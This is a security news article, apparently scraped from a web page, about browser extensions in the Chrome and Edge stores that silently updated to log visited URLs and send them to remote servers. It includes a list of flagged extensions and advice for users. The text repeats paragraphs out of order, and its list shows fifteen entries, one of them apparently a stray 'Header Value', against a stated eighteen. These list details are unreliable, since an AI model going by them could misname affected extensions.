Several browser extensions once trusted by users have been flagged for silently collecting private browsing data and routing traffic through external servers. These tools, listed in both Google’s Chrome Web Store and Microsoft Edge Add-ons, had a combined installation base exceeding 2.3 million. Most appeared functional and safe. Some were verified by Google or featured on storefronts, giving users a false sense of security.
The change went largely unnoticed. Because Google and Microsoft deploy extension updates silently, most users were unaware of the switch. The same update process that ensures convenience helped spread the malware without user input.
The group behind this effort used simple browser APIs to run background processes. A small piece of code activated when users opened a new tab or navigated to a page. It would capture the current URL and send it along with a user ID to a remote server. In some cases, the server could send back new instructions, redirecting users to other websites.
Some extensions are no longer available, but several still remain listed. At least one, Volume Max — Ultimate Sound Booster, had been flagged previously by another research team. No direct abuse was confirmed at the time, though the code raised concerns.
Flagged extensions include:
Color Picker, Eyedropper — Geco colorpick
Video Speed Controller — Video manager
Free Weather Forecast
Emoji keyboard online
Volume Max — Ultimate Sound Booster
Dark Theme — Dark Reader for Chrome
Unlock Discord
Unlock TikTok
Unlock YouTube VPN
Weather
SearchGPT — ChatGPT for Search Engine
Web Sound Equalizer
Flash Player — games emulator
Youtube Unblocked
Header Value
Koi Security found that every extension tied to this campaign offered real functionality. Users had no obvious reason to suspect they were being monitored. The timing of the investigation also coincides with recent classification work by MITRE, which added browser-related extensions to its threat categories.
This incident may serve as a reference point for platform updates, but for now, users should keep reviewing installed add-ons and stay cautious of updates, even from tools they’ve used for years.
Notes: This post was edited/created using GenAI tools. Image: DIW-Aigen.
Read next: Can Tech Leaders Say Anything Anymore? A Sequoia Partner’s Post Just Reignited the Debate
Extensions That Functioned as Advertised, Until They Didn’t
One of the flagged tools was a color selection utility listed under the name Color Picker, Eyedropper — Geco colorpick. It worked as expected for years. Then a version update introduced background scripts that began logging users’ website visits and sending that data to remote infrastructure.The change went largely unnoticed. Because Google and Microsoft deploy extension updates silently, most users were unaware of the switch. The same update process that ensures convenience helped spread the malware without user input.
A Pattern Behind the Code
Koi Security, the firm that investigated the extension, linked this activity to a broader effort involving 18 different extensions. These included VPNs, weather tools, video controllers, sound boosters, and emoji keyboards. Despite serving different functions, they shared the same surveillance mechanism and connected to related servers. Each extension had its own subdomain, but the setup pointed to a central operator.The group behind this effort used simple browser APIs to run background processes. A small piece of code activated when users opened a new tab or navigated to a page. It would capture the current URL and send it along with a user ID to a remote server. In some cases, the server could send back new instructions, redirecting users to other websites.
No Initial Signs of Abuse
Early versions of these extensions had clean code. Many were available for months or even years without any known malicious behavior. In most cases, the harmful updates came later. It remains unclear whether the original developers introduced the changes or if the extensions were taken over.Some extensions are no longer available, but several still remain listed. At least one, Volume Max — Ultimate Sound Booster, had been flagged previously by another research team. No direct abuse was confirmed at the time, though the code raised concerns.
Impacted Users and Recommendations
Based on current data, 1.7 million installs were recorded on Chrome and another 600,000 on Edge. The researchers recommend removing all affected extensions, clearing stored browser data, and scanning systems for malware. Users should also check their online accounts for any unexpected activity, especially if they accessed sensitive websites while these extensions were active.Flagged extensions include:
Color Picker, Eyedropper — Geco colorpick
Video Speed Controller — Video manager
Free Weather Forecast
Emoji keyboard online
Volume Max — Ultimate Sound Booster
Dark Theme — Dark Reader for Chrome
Unlock Discord
Unlock TikTok
Unlock YouTube VPN
Weather
SearchGPT — ChatGPT for Search Engine
Web Sound Equalizer
Flash Player — games emulator
Youtube Unblocked
Header Value
Marketplace Security Gaps
This incident highlights structural problems in how extensions are vetted. Most users assume that featured or verified listings are safe. Attackers used that trust to gain access. The problem wasn’t one extension. It was the system that allowed silent changes to go unchecked across several storefronts.Koi Security found that every extension tied to this campaign offered real functionality. Users had no obvious reason to suspect they were being monitored. The timing of the investigation also coincides with recent classification work by MITRE, which added browser-related extensions to its threat categories.
Next Steps for Platforms and Users
Researchers recommend stricter checks before extensions are verified or promoted. Once installed, any major code change should trigger alerts or require renewed permission from the user. Until that happens, extension ecosystems will remain vulnerable to similar operations.This incident may serve as a reference point for platform updates, but for now, users should keep reviewing installed add-ons and stay cautious of updates, even from tools they’ve used for years.
Notes: This post was edited/created using GenAI tools. Image: DIW-Aigen.
Read next: Can Tech Leaders Say Anything Anymore? A Sequoia Partner’s Post Just Reignited the Debate
